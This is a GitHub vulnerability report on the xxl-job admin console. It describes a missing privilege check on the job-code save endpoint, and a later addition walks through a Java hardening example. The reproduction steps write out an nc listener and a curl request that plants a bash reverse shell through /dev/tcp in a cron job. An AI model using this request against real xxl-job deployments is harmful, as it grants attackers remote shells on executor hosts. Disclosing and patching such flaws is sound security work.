xuxueli / xxl-job

A distributed task scheduling framework.(分布式任务调度平台XXL-JOB)
http://www.xuxueli.com/xxl-job/
GNU General Public License v3.0

Remote Code Execution in /xxl-job-admin/jobcode/save #3333

Open N0th1n3 opened 11 months ago

N0th1n3 commented 11 months ago

Environment

MySQL 5.7.44, XXL-Job-Admin 2.4.0
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)

Vulnerability Information

It was found that /xxl-job-admin/jobcode/save does not validate user privileges. Modifying the code of a running cron job on the job executor does not require privileged user access. By leveraging the vulnerability, users could craft HTTP requests to modify and run arbitrary code (e.g., sensitive information disclosure or a reverse shell) on the job executor.

Steps to reproduce the behavior

Step 1: Create a listener: nc -nlvp 8888

Step 2: Create an unprivileged user and get its cookie.

Step 3: Craft an HTTP request for job code saving. This demonstration uses a reverse shell payload.
curl http://<IP Address>:<Port>/xxl-job-admin/jobcode/save --cookie "xxljob_adminlte_settings=on; XXL_JOB_LOGIN_IDENTITY=<Unprivileged Cookie>" -d "id=2&glueSource=%23%2Fbin%2Fbash%0Abash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F<Reverse shell IP>%2F<Reverse shell port>%200%3E%261&glueRemark=Test"

Step 4: Trigger the cron job, or wait until it executes. A reverse shell will be spawned.

75ACOL commented 10 months ago

Create an unprivileged user and get its cookie, which I don't think is easy for attackers.

N0th1n3 commented 10 months ago

Agree. The assumption of the attack is that you gained an unprivileged account.

xiemeng9462 commented 9 months ago

So how should this vulnerability be fixed?

liuyucheng182 commented 8 months ago

Same question: how should this vulnerability be fixed?
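As an added illustration for the vulnerability described in the opening comment and the fix question raised in the last two replies, the self-contained Java sketch below models the missing check: the save handler looks up the job by id, then requires that the caller is either an administrator or holds permission on that job's executor group before the GLUE source is replaced. This is not xxl-job's code and not the maintainers' fix; the class, field and method names (LoginUser, JobInfo, JOBS, saveVulnerable, saveHardened, the role/permission encoding) are assumptions chosen for this example.

```java
import java.util.Arrays;
import java.util.HashMap;
import java.util.Map;

/**
 * Hypothetical model of a job-code save endpoint, written for this issue as an
 * illustration. Names and structure are assumptions, not xxl-job's own code.
 */
public class JobCodeSaveExample {

    /** Stand-in for the logged-in admin-console user. role 1 = admin, 0 = normal user. */
    static final class LoginUser {
        final String username;
        final int role;
        /** Comma-separated ids of executor groups this user may manage, e.g. "2,5". */
        final String permission;

        LoginUser(String username, int role, String permission) {
            this.username = username;
            this.role = role;
            this.permission = permission;
        }

        /** Admins manage every group; normal users only the groups listed in permission. */
        boolean mayManageGroup(int jobGroup) {
            if (role == 1) {
                return true;
            }
            if (permission == null || permission.trim().isEmpty()) {
                return false;
            }
            return Arrays.asList(permission.split(",")).contains(String.valueOf(jobGroup));
        }
    }

    /** Stand-in for one job row: its id, its executor group, and its GLUE source. */
    static final class JobInfo {
        final int id;
        final int jobGroup;
        String glueSource;

        JobInfo(int id, int jobGroup, String glueSource) {
            this.id = id;
            this.jobGroup = jobGroup;
            this.glueSource = glueSource;
        }
    }

    /** In-memory stand-in for the job table (constructed data for this example). */
    static final Map<Integer, JobInfo> JOBS = new HashMap<>();

    /** Pattern reported in the issue: input is validated, but nobody asks who the caller is. */
    static String saveVulnerable(int id, String glueSource, String glueRemark) {
        if (glueRemark == null || glueRemark.trim().isEmpty()) {
            return "FAIL: glueRemark is required";
        }
        JobInfo job = JOBS.get(id);
        if (job == null) {
            return "FAIL: job " + id + " not found";
        }
        job.glueSource = glueSource;   // any authenticated user reaches this line
        return "SUCCESS";
    }

    /** Hardened form: same validation, plus a group-scoped permission check before the write. */
    static String saveHardened(LoginUser caller, int id, String glueSource, String glueRemark) {
        if (glueRemark == null || glueRemark.trim().isEmpty()) {
            return "FAIL: glueRemark is required";
        }
        JobInfo job = JOBS.get(id);
        if (job == null) {
            return "FAIL: job " + id + " not found";
        }
        // Check against the group stored with the job, never a group id supplied by the client.
        if (!caller.mayManageGroup(job.jobGroup)) {
            return "FAIL: user " + caller.username + " has no permission on group " + job.jobGroup;
        }
        job.glueSource = glueSource;
        return "SUCCESS";
    }

    public static void main(String[] args) {
        JOBS.put(2, new JobInfo(2, 1, "#!/bin/bash\necho original"));
        // Constructed users: an admin, and a normal user with rights only on executor group 7.
        LoginUser admin = new LoginUser("admin", 1, null);
        LoginUser lowPriv = new LoginUser("guest", 0, "7");
        String newSource = "#!/bin/bash\necho replaced";

        System.out.println("vulnerable, guest: " + saveVulnerable(2, newSource, "Test"));
        JOBS.get(2).glueSource = "#!/bin/bash\necho original";   // reset between runs
        System.out.println("hardened, guest:   " + saveHardened(lowPriv, 2, newSource, "Test"));
        System.out.println("hardened, admin:   " + saveHardened(admin, 2, newSource, "Test"));
        System.out.println("glue source now:   " + JOBS.get(2).glueSource.replace('\n', ' '));
    }
}
```

Two points from the example carry over to a real fix: the authorization decision has to be keyed on the executor group recorded for the job being edited, not on anything in the request body, and the same check belongs on every endpoint that changes or triggers a job, since an editor that only protects the UI page and not the save handler is exactly the gap the reporter's curl request walks through. After patching, repeat Step 3 from the report with the unprivileged cookie and confirm the response is a permission failure and the job's GLUE source is unchanged.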